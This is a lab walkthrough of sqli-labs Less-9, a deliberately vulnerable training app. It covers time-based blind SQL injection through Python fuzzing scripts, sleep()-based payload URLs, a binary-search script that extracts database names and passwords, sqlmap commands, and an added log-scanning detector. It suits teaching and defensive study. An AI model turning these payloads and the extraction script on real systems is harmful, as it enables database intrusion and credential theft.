sqli-lab-less9

1. Target address

Less-9 GET-Blind-Time Based-Single Quotes
# Single-quote time-based blind injection
http://127.0.0.1/sqli/less-9/

2. Vulnerability probing

Because the number of fuzz payloads to probe has grown, a Python script is used for the probing.
import requests

url = "http://192.168.128.159/sqli/less-9/index.php?id=1"
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
# fuzz.txt holds one payload per line (the quote/bracket variants listed below)
with open("./fuzz.txt", "r") as file:
    payloads = file.read().splitlines()

for i, payload in enumerate(payloads):
    print("==============This is " + str(i) + " " + payload + "==============")
    response = requests.get(url + payload, headers=header)
    print(response.text)
Result
' --+   normal response
" --+   normal response
') --+  normal response
") --+  normal response
')) --+ normal response
")) --+ normal response

Since there is no difference in the responses, a time-based blind injection probe is tried next.
import requests
import time

url = "http://192.168.128.159/sqli/less-9/index.php?id=1"
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
# fuzz.txt now holds the sleep(5) payload variants listed below
with open("./fuzz.txt", "r") as file:
    payloads = file.read().splitlines()

for i, payload in enumerate(payloads):
    print("==============This is " + str(i) + " " + payload + "==============")
    start = time.time()
    response = requests.get(url + payload, headers=header)
    end = time.time()
    # a round trip well above the normal one means sleep(5) was executed
    if end - start > 4:
        print(end - start)
        print(response.text)
    else:
        print(end - start)
Result
' and sleep(5) --+  response after 7 seconds
" and sleep(5) --+
') and sleep(5) --+
") and sleep(5) --+
')) and sleep(5) --+
")) and sleep(5) --+

The inferred query is: select * from users where id='id' limit 0,1;

3. Source code analysis

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity

    // $id is concatenated straight into the query: the single-quote injection point
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
    }
    else
    {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........'; // the error response is identical to the normal response
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
}
else { echo "Please input the ID as parameter with numeric value";}

?>
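As an added defensive example (not part of the original write-up), the following Python scans the result.txt log that the source above appends every id value to, and flags the time-based blind probes used in this lesson. The sample log lines and the indicator names are constructed for the illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of the result.txt log that the Less-9 source appends to
# (one "ID:<id>" line per request); not taken from the original page.
SAMPLE_LOG = """ID:1
ID:1' and sleep(5) --+
ID:1' and if(ascii(substr(database(),1,1)) >80,sleep(1),0) --+
ID:1' AND (SELECT 3087 FROM (SELECT(SLEEP(5)))nKZa) AND 'fsem'='fsem
ID:2
ID:1%27%20and%20if(length(database())%3D8,sleep(5),0)%20--+
"""

# Indicators of the time-based blind technique described above, matched
# after URL-decoding and case-folding. The indicator names are my own labels.
INDICATORS = {
    "sleep_call": re.compile(r"\bsleep\s*\("),
    "benchmark_call": re.compile(r"\bbenchmark\s*\("),
    "char_probe": re.compile(r"\b(ascii|left|substr|mid)\s*\("),
    "schema_read": re.compile(r"information_schema\."),
    "comment_tail": re.compile(r"--(\s|\+|$)"),
}


def classify_id(raw_id):
    """Return the indicator names that fire for one logged id value.
    Less-9 expects a purely numeric id, so anything else is also reported."""
    decoded = unquote_plus(raw_id).strip().lower()
    found = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if not decoded.isdigit():
        found.append("non_numeric_id")
    return found


def scan_log(text):
    """Parse 'ID:<value>' lines; return (line_no, raw_id, indicators) per hit."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.startswith("ID:"):
            continue
        raw_id = line[3:]
        found = classify_id(raw_id)
        if found:
            hits.append((line_no, raw_id, found))
    return hits


if __name__ == "__main__":
    for line_no, raw_id, found in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(found)} <- {raw_id}")
```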

4. Black-box and white-box testing

Enumerate databases: select schema_name from information_schema.schemata
Enumerate tables: select table_name from information_schema.tables where table_schema="security" (the security database is used as the example here)
Enumerate columns: select column_name from information_schema.columns where table_name="users" (the users table is used as the example here)
Enumerate column values: select username,password from security.users (the username and password columns are used as the example here)

Functions commonly used in time-based blind injection:
if(expr1,expr2,expr3): conditional; if expr1 is true, expr2 is evaluated, otherwise expr3
sleep(n)      suspend execution for n seconds
left(a,b)     take the first b characters of a from the left
substr(a,b,c) take c characters of string a starting at position b
mid(a,b,c)    take c characters of string a starting at position b
length()      return the length of a string
ascii()       convert a character to its ASCII value
char()        convert an ASCII code to the corresponding character

# The extraction approach is:
# Length of the database version string
http://127.0.0.1/sqli/less-8/?id=1' and if(length(version())=5,sleep(5),0) --+

# Database version
http://127.0.0.1/sqli/less-8/?id=1' and if(left(version(),1)=5,sleep(5),0) --+

# Length of the database name
http://127.0.0.1/sqli/less-8/?id=1' and if(length(database())=5,sleep(5),0) --+

# Database name
# Test whether the first character of the database name is s
http://127.0.0.1/sqli/less-8/?id=1' and if(left(database(),1)='s',sleep(5),0) --+
# Test whether the first character of the database name is greater than a
http://127.0.0.1/sqli/less-8/?id=1' and if(left(database(),1)>'a',sleep(5),0) --+
# Test whether the first two characters of the database name are greater than sa
http://127.0.0.1/sqli/less-8/?id=1' and if(left(database(),2)>'sa',sleep(5),0) --+
# Test whether the ASCII value of the first character of the database name is greater than 80
http://127.0.0.1/sqli/less-8/?id=1' and if(ascii(substr(database(),1,1)) >80,sleep(5),0) --+
# Test whether the ASCII value of the second character of the database name is greater than 80
http://127.0.0.1/sqli/less-8/?id=1' and if(ascii(substr(database(),2,1)) >80,sleep(5),0) --+

# Number of tables / table name length / table names
# Determined by varying the values of x, y and z
http://127.0.0.1/sqli/less-8/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit x,1),y)="z",sleep(5),0) --+

# Number of columns / column name length / column names
# Determined by varying the values of x, y and z
http://127.0.0.1/sqli/less-8/?id=1' and if(left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit x,1),y)="z",sleep(5),0) --+

# Column values
http://127.0.0.1/sqli/less-8/?id=1' and if(left((select username from users limit x,1),y)="",sleep(5),0) --+
http://127.0.0.1/sqli/less-8/?id=1' and if(left((select password from users limit x,1),y)="",sleep(5),0) --+

5. Writing the script

# Binary-search extraction
# The script does not dump every table; it works toward the target one step at a time to reduce traffic
# Extract the database name length and the database name
import requests
import time

url = "http://192.168.128.159/sqli/less-9/index.php?id=1"
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
# Seconds passed to sleep(). The threshold must not exceed the sleep itself:
# the earlier probe showed sleep(5) returning after about 7 s, so sleep(1)
# checked against a 3 s threshold would never register a true condition.
DELAY = 2

def extract(expr, label):
    # Recover the string value of SQL expression expr one character at a time,
    # binary-searching the ASCII value (32..127) of each position with timed requests.
    value = ""
    for i in range(1, 1000):
        low, high = 32, 128
        while low < high:
            mid = (low + high) // 2
            payload = f"' and if(ascii(substr(({expr}),{i},1))>{mid},sleep({DELAY}),0) --+"
            start = time.time()
            requests.get(url + payload, headers=header)
            if time.time() - start >= DELAY:
                low = mid + 1   # delay observed: the character is greater than mid
            else:
                high = mid      # no delay: the character is at most mid
        if low <= 32 or low >= 127:  # ascii('') is 0 past the end of the string, so this detects the length
            break
        value += chr(low)
    print(f"The {label} is {value}")
    return value

extract("database()", "database")
# The database name security is known from the previous step
extract("select group_concat(table_name) from information_schema.tables where table_schema='security'", "tables")
# The table name users is known from the previous step
extract("select group_concat(column_name) from information_schema.columns where table_name='users'", "column_name")
# The column name password is known from the previous step;
# select(group_concat(password))from(users); is the same query as select group_concat(password) from users;
extract("select group_concat(password) from users", "column_value")

6. sqlmap

sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --batch

Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3087 FROM (SELECT(SLEEP(5)))nKZa) AND 'fsem'='fsem
sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --technique T --dbs --batch
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test
sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --technique T -D security --tables --batch
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --technique B -D security -T users --columns --batch
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
sqlmap -u http://127.0.0.1/sqli/Less-9/?id=1 --technique B -D security -T users -C username,password --dump --batch
Database: security
Table: users
[13 entries]
+----------+------------+
| username | password   |
+----------+------------+
| admin    | admin      |
| admin1   | admin1     |
| admin2   | admin2     |
| admin3   | admin3     |
| admin4   | admin4     |
| secure   | crappy     |
| Dumb     | Dumb       |
| dhakkan  | dumbo      |
| superman | genious    |
| Angelina | I-kill-you |
| batman   | mob!le     |
| Dummy    | p@ssword   |
| stupid   | stupidity  |
+----------+------------+

7. Summary

1. When the normal response and the error response are identical, use time-based blind injection.